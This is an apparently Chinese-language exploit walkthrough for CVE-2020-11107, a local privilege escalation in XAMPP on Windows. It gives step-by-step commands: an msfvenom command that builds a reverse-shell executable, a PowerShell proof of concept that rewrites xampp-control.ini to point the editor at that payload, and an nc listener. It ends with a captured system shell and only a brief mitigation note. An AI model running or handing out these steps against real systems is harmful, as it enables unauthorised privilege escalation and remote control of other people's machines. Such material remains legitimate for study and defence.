CVE-2020-11107 是一个影响 Windows 上 Apache Friends XAMPP 的 本地权限提升 (LPE) 漏洞。
非特权用户可以修改 XAMPP 控制面板配置文件 (xampp-control.ini),并将默认编辑器可执行文件 (notepad.exe) 替换为恶意可执行文件。
当另一个用户(例如管理员)通过控制面板打开日志时,恶意二进制文件会以受害者的权限执行,从而导致权限提升。
❗ 该漏洞不影响 Linux 或 macOS。
xampp-control.ini 全局可写C:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe
验证 XAMPP 版本:
type C:\xampp\properties.ini
示例输出:
base_stack_version=7.3.10-1
base_stack_platform=windows-x64
✅ 该版本存在漏洞。
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe
mkdir C:\temp
# Upload msf.exe into C:\temp
利用脚本 (PowerShell):
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
运行脚本:
powershell -ExecutionPolicy Bypass -File 50337.ps1
受害者启动:
C:\xampp\xampp-control.exe
然后从控制面板打开任意日志文件。
nc -lvnp 4444
✅ 结果:
Connection received...
C:\WINDOWS\system32>
🎉 权限提升成功
将 XAMPP 更新到以下版本之一(或更新版本):
限制以下文件的权限:
C:\xampp\xampp-control.ini